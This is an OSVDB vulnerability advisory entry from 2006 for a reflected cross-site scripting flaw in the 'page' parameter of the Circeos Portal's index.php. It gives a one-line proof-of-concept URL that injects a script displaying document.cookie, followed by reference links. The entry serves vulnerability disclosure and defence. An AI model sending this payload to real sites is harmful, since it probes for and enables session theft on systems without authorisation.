Cireos Portal index.php page Variable XSS

2006-04-28T03:24:17
ID OSVDB:25297
Type osvdb
Reporter OSVDB
Modified 2006-04-28T03:24:17

Description

Manual Testing Notes

http://[target]/path/index.php?page=<script>alert(document.cookie)</script><!--

References:

Vendor URL: http://www.circeos.it/ Related OSVDB ID: 25296 Other Advisory URL: http://www.aria-security.net/portal/circeos.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0584.html